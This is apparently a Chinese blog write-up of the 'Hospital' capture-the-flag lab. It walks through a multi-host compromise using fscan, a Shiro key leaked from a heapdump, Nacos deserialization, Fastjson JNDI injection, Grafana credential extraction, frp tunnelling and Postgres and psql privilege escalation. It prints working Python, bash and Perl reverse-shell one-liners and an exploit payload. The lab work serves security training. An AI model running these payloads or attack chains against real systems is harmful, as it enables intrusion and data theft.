boxmoe_header_banner_img

Hello! 欢迎来到zz的小站!

加载中

POST
文章导读
渗透

春秋云镜-Hospital

avatar
zzdzz 2025年12月3日 183
0 评论

参考文章

https://blog.csdn.net/uuzeray/article/details/143355454
https://h0ny.github.io/posts/Hospital-%E6%98%A5%E7%A7%8B%E4%BA%91%E5%A2%83/
https://fushuling.com/index.php/2024/01/06/%E6%98%A5%E7%A7%8B%E4%BA%91%E5%A2%83-hospital/

入口机

39.99.156.20

PS G:\tool\护网\工具打包> G:\tool\护网\工具打包\fscan322.exe -h 39.99.156.20

   ___                              _
  / _ \     ___  ___ _ __ __ _  ___| | __
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\
                     fscan version: 1.8.3
start infoscan
39.99.156.20:8080 open
[*] alive ports len is: 1
start vulscan
[*] WebTitle http://39.99.156.20:8080  code:302 len:0      title:None 跳转url: http://39.99.156.20:8080/login;jsessionid=5F7F0F21ABF706D2CC9C0C11E2BEED46
[*] WebTitle http://39.99.156.20:8080/login;jsessionid=5F7F0F21ABF706D2CC9C0C11E2BEED46 code:200 len:2005   title:医疗管理后台
[+] PocScan http://39.99.156.20:8080 poc-yaml-spring-actuator-heapdump-file
已完成 1/1
[*] 扫描结束,耗时: 15.4116903s

扫到heapdump泄露,下载下来解密

http://39.99.156.20:8080/actuator/heapdump

JDumpSpider-1.1-SNAPSHOT-full.jar

泄露出了shirokey

GAYysgMQhG7/CzIJlVpR2g==

用shiro漏洞利用工具

直接注入内存马

哥斯拉连不上,蚁剑可以

权限不够,尝试提权

find / -perm -u=s -type f 2>/dev/null

先弹个shell

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("47.115.130.26",250));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/sh")'

再起个tty

python3 -c 'import pty; pty.spawn("/bin/bash")'

vim.basic提权读到flag1

vim.basic /root/flag/flag01.txt
flag01: flag{62fcd7a5-f916-412d-b6ed-316cf7ed6def}

vim.basic提权到root

/usr/bin/vim.basic  -c ':python3 import os; os.execl("/bin/sh", "sh", "-pc", "reset; exec sh -p")'

传fscan扫内网

app@web01:/tmp$ ./fscan -h 172.30.12.5/24 -o 1.txt

   ___                              _    
  / _ \     ___  ___ _ __ __ _  ___| | __ 
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <    
\____/     |___/\___|_|  \__,_|\___|_|\_\   
                     fscan version: 1.8.4
start infoscan
trying RunIcmp2
The current user permissions unable to send icmp packets
start ping
(icmp) Target 172.30.12.5     is alive
(icmp) Target 172.30.12.6     is alive
(icmp) Target 172.30.12.236   is alive
[*] Icmp alive hosts len is: 3
172.30.12.236:8080 open
172.30.12.5:8080 open
172.30.12.6:445 open
172.30.12.6:139 open
172.30.12.6:135 open
172.30.12.236:22 open
172.30.12.5:22 open
172.30.12.236:8009 open
172.30.12.6:8848 open
[*] alive ports len is: 9
start vulscan
[*] NetInfo 
[*]172.30.12.6
   [->]Server02
   [->]172.30.12.6
[*] NetBios 172.30.12.6     WORKGROUP\SERVER02            
[*] WebTitle http://172.30.12.5:8080   code:302 len:0      title:None 跳转url: http://172.30.12.5:8080/login;jsessionid=E4E7691933F20ACA296077BADF74DECE
[*] WebTitle http://172.30.12.5:8080/login;jsessionid=E4E7691933F20ACA296077BADF74DECE code:200 len:2005   title:医疗管理后台
[*] WebTitle http://172.30.12.236:8080 code:200 len:3964   title:医院后台管理平台
[*] WebTitle http://172.30.12.6:8848   code:404 len:431    title:HTTP Status 404 – Not Found
[+] PocScan http://172.30.12.5:8080 poc-yaml-spring-actuator-heapdump-file 
[+] PocScan http://172.30.12.6:8848 poc-yaml-alibaba-nacos 
[+] PocScan http://172.30.12.6:8848 poc-yaml-alibaba-nacos-v1-auth-bypass

172.30.12.6:8848(nacos/flag02)

隧道代理

还是先工具梭一下

java -jar .\NacosExploitGUI_v4.0.jar

先弱口令进去看一下

发现数据库账号密码

username: root
password: P@ssWord!!!

之前没扫出来,应该是有另一层内网

还是得getshell,尝试打反序列化

G:\tool\nacos\NacosExploitGUI-main\NacosExploitGUI-main\漏洞复现环境\nacos-client_yaml_deserialize\yaml-payload

修改命令为创建一个管理员账号

然后直接点bat即可一键生成

放到机器1上(172.30.12.5)

python3 -m http.server 7000

工具有点bug多试几次

flag02: flag{8e585cb2-5ec1-4840-8fb0-8aec5548261d}

172.30.12.236:8080(jndi/flag03)

再打另一个web3

bp开一个socks代理

是以json形式传输数据

用bp插件来打https://github.com/amaz1ngday/fastjson-exp

直接打FastjsonEcho拿到flag3

额,抓不到包

换打法

java -cp jndi_tool.jar jndi.EvilRMIServer 2099 7777 "bash -i >& /dev/tcp/172.30.12.5/4321 0>&1"
{
    "a":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://172.30.12.5:2099/Object",
        "autoCommit":true
    }
}

拿到flag03

flag03: flag{bec6cf43-a362-49d8-b0b2-c70590fffe6f}

flag04

发现是双网卡

传fscan扫内网

我是放12.5机器,然后wget

root@web03:/tmp# ./fscan -h 172.30.54.1/24 -o 1.txt
./fscan -h 172.30.54.1/24 -o 1.txt

   ___                              _    
  / _ \     ___  ___ _ __ __ _  ___| | __ 
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <    
\____/     |___/\___|_|  \__,_|\___|_|\_\   
                     fscan version: 1.8.4
start infoscan
(icmp) Target 172.30.54.179   is alive
(icmp) Target 172.30.54.12    is alive
[*] Icmp alive hosts len is: 2
172.30.54.12:3000 open
172.30.54.179:8080 open
172.30.54.12:5432 open
172.30.54.12:22 open
172.30.54.179:22 open
172.30.54.179:8009 open
[*] alive ports len is: 6
start vulscan
[*] WebTitle http://172.30.54.179:8080 code:200 len:3964   title:医院后台管理平台
[*] WebTitle http://172.30.54.12:3000  code:302 len:29     title:None 跳转url: http://172.30.54.12:3000/login
[*] WebTitle http://172.30.54.12:3000/login code:200 len:27909  title:Grafana

扫到一个Grafana

发现新的资产不同于之前的网段,需要搭建多层代理。

在web1上运行frps

[common]
bind_port = 1000

在web3上运行frpc

[common]
tls_enable = true
server_addr =172.30.12.5
server_port = 1000
 
[plugin_socks5]
type = tcp
remote_port = 2000
plugin = socks5

上传好一堆

方便起见改密码

能直接连上web3

工具打出,获得postgres数据库账密

root@web03:~# ./linux_amd64_grafanaExp exp -u http://172.30.54.12:3000
2025/11/04 17:39:05 Target vulnerable has plugin [alertlist]
2025/11/04 17:39:05 Got secret_key [SW2YcwTIb9zpOOhoPsMm]
2025/11/04 17:39:05 There are [1] records in data_source table.
2025/11/04 17:39:05 type:[postgres]     name:[PostgreSQL]               url:[localhost:5432]    user:[postgres] password[Postgres@123]       database:[postgres]     basic_auth_user:[]      basic_auth_password:[]
2025/11/04 17:39:05 All Done, have nice day!

读取到帐号密码 postgres / Postgres@123

这里需要多次代理,用新工具

参考这篇文章https://fushuling.com/index.php/2023/09/21/%e5%86%85%e7%bd%91%e4%bb%a3%e7%90%86%e6%90%ad%e5%bb%ba/

就是vps启动控制端,然后出网机器启动客户端,连上控制端后,控制端在给出网机器开一个端口,然后让内网机器连

终于

proxychains4 -q psql -h 172.30.54.12 -U postgres -W

修改密码(后续需要用psql提权,所以先改一下root密码)

ALTER USER root WITH PASSWORD '123456';

创建命令执行函数

CREATE OR REPLACE FUNCTION system (cstring) RETURNS integer AS '/lib/x86_64-linux-gnu/libc.so.6', 'system' LANGUAGE 'c' STRICT;

perl反弹shell(弹到web3)

select system('perl -e \'use Socket;$i="172.30.54.179";$p=250;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};\'');

最后这也很坑

sudo -l查看到存在psql

打psql提权:psql | GTFOBins

sudo /usr/local/postgresql/bin/psql
\?
!/bin/bash(不要more完了,在more的时候就要敲)
cat /root/flag/flag04.txt
flag04: flag{46a691c2-a371-4954-b77c-277de02b1c49}

评论(已关闭)

评论已关闭